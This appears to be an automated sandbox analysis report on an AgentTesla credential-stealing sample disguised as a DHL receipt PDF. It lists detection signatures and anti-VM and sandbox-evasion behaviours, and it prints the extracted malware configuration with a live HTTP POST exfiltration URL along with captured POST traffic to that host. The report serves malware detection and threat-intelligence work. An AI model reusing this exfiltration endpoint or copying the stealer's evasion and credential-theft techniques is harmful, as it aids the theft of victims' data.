Loading ...

Play interactive tourEdit tour

Windows Analysis Report DHL_119040 ontvangstbewijs,pdf.exe

Overview

General Information

Sample Name:DHL_119040 ontvangstbewijs,pdf.exe
Analysis ID:528504
MD5:a9b63c434e205092b3373e35c051a04a
SHA1:1b8d4e51f63e23b881159d168b5c0e70012c7e6c
SHA256:3905a71c3e23f4845d1201f74ac1c9c041b0254ff486a3ea4fc2bb7119631ce9
Tags:exe
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Yara detected AgentTesla
Yara detected AntiVM3
Multi AV Scanner detection for domain / URL
Tries to steal Mail credentials (via file / registry access)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
.NET source code contains potential unpacker
.NET source code contains very large array initializations
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Uses a known web browser user agent for HTTP communication
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "Http", "HTTP method": "Post", "Post URL": "https://www.mgbless.in/mac/inc/0bb73b6c7ade1a.php", "User Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000000.305861427.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000004.00000000.305861427.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      00000004.00000000.306305831.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000004.00000000.306305831.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
          00000004.00000000.306831919.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 16 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            1.2.DHL_119040 ontvangstbewijs,pdf.exe.28d8f58.1.raw.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
              4.0.DHL_119040 ontvangstbewijs,pdf.exe.400000.8.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                4.0.DHL_119040 ontvangstbewijs,pdf.exe.400000.8.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                  4.0.DHL_119040 ontvangstbewijs,pdf.exe.400000.12.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    4.0.DHL_119040 ontvangstbewijs,pdf.exe.400000.12.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                      Click to see the 17 entries

                      Sigma Overview

                      No Sigma rule has matched

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 4.2.DHL_119040 ontvangstbewijs,pdf.exe.400000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Http", "HTTP method": "Post", "Post URL": "https://www.mgbless.in/mac/inc/0bb73b6c7ade1a.php", "User Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0"}
                      Multi AV Scanner detection for domain / URLShow sources
                      Source: mgbless.inVirustotal: Detection: 5%Perma Link
                      Source: www.mgbless.inVirustotal: Detection: 7%Perma Link
                      Source: http://www.mgbless.inVirustotal: Detection: 7%Perma Link
                      Source: 4.2.DHL_119040 ontvangstbewijs,pdf.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                      Source: 4.0.DHL_119040 ontvangstbewijs,pdf.exe.400000.12.unpackAvira: Label: TR/Spy.Gen8
                      Source: 4.0.DHL_119040 ontvangstbewijs,pdf.exe.400000.10.unpackAvira: Label: TR/Spy.Gen8
                      Source: 4.0.DHL_119040 ontvangstbewijs,pdf.exe.400000.8.unpackAvira: Label: TR/Spy.Gen8
                      Source: 4.0.DHL_119040 ontvangstbewijs,pdf.exe.400000.6.unpackAvira: Label: TR/Spy.Gen8
                      Source: 4.0.DHL_119040 ontvangstbewijs,pdf.exe.400000.4.unpackAvira: Label: TR/Spy.Gen8
                      Source: DHL_119040 ontvangstbewijs,pdf.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: unknownHTTPS traffic detected: 104.223.93.105:443 -> 192.168.2.3:49747 version: TLS 1.2
                      Source: DHL_119040 ontvangstbewijs,pdf.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Source: Joe Sandbox ViewASN Name: ASN-QUADRANET-GLOBALUS ASN-QUADRANET-GLOBALUS
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: Joe Sandbox ViewIP Address: 104.223.93.105 104.223.93.105
                      Source: Joe Sandbox ViewIP Address: 104.223.93.105 104.223.93.105
                      Source: global trafficHTTP traffic detected: POST /mac/inc/0bb73b6c7ade1a.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: www.mgbless.inContent-Length: 368Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /mac/inc/0bb73b6c7ade1a.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: www.mgbless.inContent-Length: 370Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /mac/inc/0bb73b6c7ade1a.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: www.mgbless.inContent-Length: 380Expect: 100-continue
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
                      Source: DHL_119040 ontvangstbewijs,pdf.exe, 00000004.00000002.566852760.0000000002811000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                      Source: DHL_119040 ontvangstbewijs,pdf.exe, 00000004.00000002.566852760.0000000002811000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                      Source: DHL_119040 ontvangstbewijs,pdf.exe, 00000004.00000002.566852760.0000000002811000.00000004.00000001.sdmpString found in binary or memory: http://lmeJrA.com
                      Source: DHL_119040 ontvangstbewijs,pdf.exe, 00000004.00000002.567156721.00000000028D9000.00000004.00000001.sdmp, DHL_119040 ontvangstbewijs,pdf.exe, 00000004.00000002.567483642.00000000029AF000.00000004.00000001.sdmp, DHL_119040 ontvangstbewijs,pdf.exe, 00000004.00000002.567260931.0000000002902000.00000004.00000001.sdmpString found in binary or memory: http://mgbless.in
                      Source: DHL_119040 ontvangstbewijs,pdf.exe, 00000001.00000002.309960102.000000000293B000.00000004.00000001.sdmp, DHL_119040 ontvangstbewijs,pdf.exe, 00000001.00000002.309824480.0000000002871000.00000004.00000001.sdmp, DHL_119040 ontvangstbewijs,pdf.exe, 00000004.00000002.567106742.00000000028BC000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: DHL_119040 ontvangstbewijs,pdf.exe, 00000004.00000002.567156721.00000000028D9000.00000004.00000001.sdmp, DHL_119040 ontvangstbewijs,pdf.exe, 00000004.00000002.567483642.00000000029AF000.00000004.00000001.sdmp, DHL_119040 ontvangstbewijs,pdf.exe, 00000004.00000002.567260931.0000000002902000.00000004.00000001.sdmpString found in binary or memory: http://www.mgbless.in
                      Source: DHL_119040 ontvangstbewijs,pdf.exe, 00000004.00000002.567237496.00000000028F9000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%
                      Source: DHL_119040 ontvangstbewijs,pdf.exe, 00000004.00000002.566852760.0000000002811000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%GETMozilla/5.0
                      Source: DHL_119040 ontvangstbewijs,pdf.exe, 00000004.00000002.567106742.00000000028BC000.00000004.00000001.sdmpString found in binary or memory: https://www.mgbless.in
                      Source: DHL_119040 ontvangstbewijs,pdf.exe, 00000004.00000003.346874952.0000000000C23000.00000004.00000001.sdmpString found in binary or memory: https://www.mgbless.in/
                      Source: DHL_119040 ontvangstbewijs,pdf.exe, 00000004.00000002.567106742.00000000028BC000.00000004.00000001.sdmpString found in binary or memory: https://www.mgbless.in/mac/inc/0bb73b6c7ade1a.php
                      Source: DHL_119040 ontvangstbewijs,pdf.exe, 00000004.00000002.566852760.0000000002811000.00000004.00000001.sdmpString found in binary or memory: https://www.mgbless.in/mac/inc/0bb73b6c7ade1a.php127.0.0.1POST
                      Source: DHL_119040 ontvangstbewijs,pdf.exe, 00000004.00000002.567106742.00000000028BC000.00000004.00000001.sdmpString found in binary or memory: https://www.mgbless.in4
                      Source: DHL_119040 ontvangstbewijs,pdf.exe, 00000004.00000002.567483642.00000000029AF000.00000004.00000001.sdmp, DHL_119040 ontvangstbewijs,pdf.exe, 00000004.00000002.567260931.0000000002902000.00000004.00000001.sdmpString found in binary or memory: https://www.mgbless.inD8
                      Source: DHL_119040 ontvangstbewijs,pdf.exe, 00000001.00000002.310307492.000000000387D000.00000004.00000001.sdmp, DHL_119040 ontvangstbewijs,pdf.exe, 00000004.00000000.305861427.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                      Source: DHL_119040 ontvangstbewijs,pdf.exe, 00000004.00000002.566852760.0000000002811000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
                      Source: unknownHTTP traffic detected: POST /mac/inc/0bb73b6c7ade1a.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: www.mgbless.inContent-Length: 368Expect: 100-continueConnection: Keep-Alive
                      Source: unknownDNS traffic detected: queries for: www.mgbless.in
                      Source: unknownHTTPS traffic detected: 104.223.93.105:443 -> 192.168.2.3:49747 version: TLS 1.2

                      System Summary:

                      barindex
                      .NET source code contains very large array initializationsShow sources
                      Source: 4.2.DHL_119040 ontvangstbewijs,pdf.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b03A0F30Cu002d135Du002d465Du002d890Au002d43EFC19CAB91u007d/E21F461Cu002dB8FDu002d40BBu002dACBAu002d17BB57CD05CC.csLarge array initialization: .cctor: array initializer size 11846
                      Source: 4.0.DHL_119040 ontvangstbewijs,pdf.exe.400000.12.unpack, u003cPrivateImplementationDetailsu003eu007b03A0F30Cu002d135Du002d465Du002d890Au002d43EFC19CAB91u007d/E21F461Cu002dB8FDu002d40BBu002dACBAu002d17BB57CD05CC.csLarge array initialization: .cctor: array initializer size 11846
                      Source: 4.0.DHL_119040 ontvangstbewijs,pdf.exe.400000.10.unpack, u003cPrivateImplementationDetailsu003eu007b03A0F30Cu002d135Du002d465Du002d890Au002d43EFC19CAB91u007d/E21F461Cu002dB8FDu002d40BBu002dACBAu002d17BB57CD05CC.csLarge array initialization: .cctor: array initializer size 11846
                      Source: 4.0.DHL_119040 ontvangstbewijs,pdf.exe.400000.8.unpack, u003cPrivateImplementationDetailsu003eu007b03A0F30Cu002d135Du002d465Du002d890Au002d43EFC19CAB91u007d/E21F461Cu002dB8FDu002d40BBu002dACBAu002d17BB57CD05CC.csLarge array initialization: .cctor: array initializer size 11846
                      Source: DHL_119040 ontvangstbewijs,pdf.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeCode function: 1_2_004B5C24
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeCode function: 1_2_00D98250
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeCode function: 1_2_00D9D2F8
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeCode function: 1_2_05075AA0
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeCode function: 1_2_05075AB0
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeCode function: 4_2_00505C24
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeCode function: 4_2_00C721A8
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeCode function: 4_2_00C70D68
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeCode function: 4_2_00C756E8
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeCode function: 4_2_00C7B7A0
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeCode function: 4_2_00C7C5B8
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeCode function: 4_2_00C74A50
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeCode function: 4_2_00C7C668
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeCode function: 4_2_00C8C080
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeCode function: 4_2_00C82618
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeCode function: 4_2_00C81FF0
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeCode function: 4_2_00C82F6D
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeCode function: 4_2_00C8AB78
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeCode function: 4_2_00C8A1C0
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeCode function: 4_2_00C8E930
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeCode function: 4_2_026846A0
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeCode function: 4_2_026845B0
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeCode function: 4_2_0268DA00
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeCode function: 4_2_00C7E438
                      Source: DHL_119040 ontvangstbewijs,pdf.exeBinary or memory string: OriginalFilename vs DHL_119040 ontvangstbewijs,pdf.exe
                      Source: DHL_119040 ontvangstbewijs,pdf.exe, 00000001.00000002.309034785.00000000004B2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameIsJitIntrins.exe. vs DHL_119040 ontvangstbewijs,pdf.exe
                      Source: DHL_119040 ontvangstbewijs,pdf.exe, 00000001.00000002.309960102.000000000293B000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameInnerException.dll" vs DHL_119040 ontvangstbewijs,pdf.exe
                      Source: DHL_119040 ontvangstbewijs,pdf.exe, 00000001.00000002.309824480.0000000002871000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameInnerException.dll" vs DHL_119040 ontvangstbewijs,pdf.exe
                      Source: DHL_119040 ontvangstbewijs,pdf.exe, 00000001.00000002.309824480.0000000002871000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamerrNOpTKQfXOboHdQAJfuZzXWwnBGhmltNFVw.exe4 vs DHL_119040 ontvangstbewijs,pdf.exe
                      Source: DHL_119040 ontvangstbewijs,pdf.exe, 00000001.00000002.310307492.000000000387D000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamerrNOpTKQfXOboHdQAJfuZzXWwnBGhmltNFVw.exe4 vs DHL_119040 ontvangstbewijs,pdf.exe
                      Source: DHL_119040 ontvangstbewijs,pdf.exe, 00000001.00000002.310307492.000000000387D000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUI.dll@ vs DHL_119040 ontvangstbewijs,pdf.exe
                      Source: DHL_119040 ontvangstbewijs,pdf.exe, 00000001.00000002.313255265.0000000005CA0000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameUI.dll@ vs DHL_119040 ontvangstbewijs,pdf.exe
                      Source: DHL_119040 ontvangstbewijs,pdf.exe, 00000001.00000002.312491538.0000000005810000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameInnerException.dll" vs DHL_119040 ontvangstbewijs,pdf.exe
                      Source: DHL_119040 ontvangstbewijs,pdf.exeBinary or memory string: OriginalFilename vs DHL_119040 ontvangstbewijs,pdf.exe
                      Source: DHL_119040 ontvangstbewijs,pdf.exe, 00000004.00000000.304523646.0000000000502000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameIsJitIntrins.exe. vs DHL_119040 ontvangstbewijs,pdf.exe
                      Source: DHL_119040 ontvangstbewijs,pdf.exe, 00000004.00000002.565220129.0000000000938000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs DHL_119040 ontvangstbewijs,pdf.exe
                      Source: DHL_119040 ontvangstbewijs,pdf.exe, 00000004.00000000.306861982.0000000000438000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamerrNOpTKQfXOboHdQAJfuZzXWwnBGhmltNFVw.exe4 vs DHL_119040 ontvangstbewijs,pdf.exe
                      Source: DHL_119040 ontvangstbewijs,pdf.exeBinary or memory string: OriginalFilenameIsJitIntrins.exe. vs DHL_119040 ontvangstbewijs,pdf.exe
                      Source: DHL_119040 ontvangstbewijs,pdf.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: DHL_119040 ontvangstbewijs,pdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeFile read: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exe:Zone.IdentifierJump to behavior
                      Source: DHL_119040 ontvangstbewijs,pdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exe "C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exe"
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess created: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exe C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exe
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess created: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exe C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exe
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\DHL_119040 ontvangstbewijs,pdf.exe.logJump to behavior
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/1@6/2
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
                      Source: DHL_119040 ontvangstbewijs,pdf.exeString found in binary or memory: /IsJitIntrins;component/views/addbook.xaml
                      Source: DHL_119040 ontvangstbewijs,pdf.exeString found in binary or memory: views/addbook.baml
                      Source: DHL_119040 ontvangstbewijs,pdf.exeString found in binary or memory: views/addcustomer.baml
                      Source: DHL_119040 ontvangstbewijs,pdf.exeString found in binary or memory: /IsJitIntrins;component/views/addcustomer.xaml
                      Source: DHL_119040 ontvangstbewijs,pdf.exeString found in binary or memory: /IsJitIntrins;component/views/addbook.xaml
                      Source: DHL_119040 ontvangstbewijs,pdf.exeString found in binary or memory: views/addbook.baml
                      Source: DHL_119040 ontvangstbewijs,pdf.exeString found in binary or memory: views/addcustomer.baml
                      Source: DHL_119040 ontvangstbewijs,pdf.exeString found in binary or memory: /IsJitIntrins;component/views/addcustomer.xaml
                      Source: DHL_119040 ontvangstbewijs,pdf.exeString found in binary or memory: U/IsJitIntrins;component/views/addbook.xamlk/IsJitIntrins;component/views/borrowfrombookview.xamla/IsJitIntrins;component/views/borrowingview.xaml[/IsJitIntrins;component/views/changebook.xamlc/IsJitIntrins;component/views/changecustomer.xaml_/IsJitIntrins;component/views/customerview.xamlc/IsJitIntrins;component/views/deletecustomer.xamlY/IsJitIntrins;component/views/errorview.xaml]/IsJitIntrins;component/views/smallextras.xaml]/IsJitIntrins;component/views/addcustomer.xaml
                      Source: DHL_119040 ontvangstbewijs,pdf.exeString found in binary or memory: *images/booksimage.jpg$views/addbook.baml1J,views/addcustomer.baml
                      Source: 4.2.DHL_119040 ontvangstbewijs,pdf.exe.400000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 4.2.DHL_119040 ontvangstbewijs,pdf.exe.400000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 4.0.DHL_119040 ontvangstbewijs,pdf.exe.400000.12.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 4.0.DHL_119040 ontvangstbewijs,pdf.exe.400000.12.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 4.0.DHL_119040 ontvangstbewijs,pdf.exe.400000.10.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 4.0.DHL_119040 ontvangstbewijs,pdf.exe.400000.10.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: DHL_119040 ontvangstbewijs,pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: DHL_119040 ontvangstbewijs,pdf.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

                      Data Obfuscation:

                      barindex
                      .NET source code contains potential unpackerShow sources
                      Source: DHL_119040 ontvangstbewijs,pdf.exe, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 1.0.DHL_119040 ontvangstbewijs,pdf.exe.4b0000.0.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 1.2.DHL_119040 ontvangstbewijs,pdf.exe.4b0000.0.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 4.0.DHL_119040 ontvangstbewijs,pdf.exe.500000.2.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 4.0.DHL_119040 ontvangstbewijs,pdf.exe.500000.3.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 4.0.DHL_119040 ontvangstbewijs,pdf.exe.500000.5.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 4.2.DHL_119040 ontvangstbewijs,pdf.exe.500000.1.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 4.0.DHL_119040 ontvangstbewijs,pdf.exe.500000.9.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 4.0.DHL_119040 ontvangstbewijs,pdf.exe.500000.0.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 4.0.DHL_119040 ontvangstbewijs,pdf.exe.500000.1.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 4.0.DHL_119040 ontvangstbewijs,pdf.exe.500000.11.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 4.0.DHL_119040 ontvangstbewijs,pdf.exe.500000.7.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeCode function: 1_2_004B9347 push ds; ret
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeCode function: 1_2_004B9361 push ds; retf
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeCode function: 1_2_004B92F5 push ds; ret
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeCode function: 4_2_00509347 push ds; ret
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeCode function: 4_2_005092F5 push ds; ret
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeCode function: 4_2_00509361 push ds; retf
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeCode function: 4_2_00C7C260 push eax; retf
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeCode function: 4_2_00C7C3B3 push eax; retf
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeCode function: 4_2_00C87E3F push edi; retn 0000h
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.8827247031
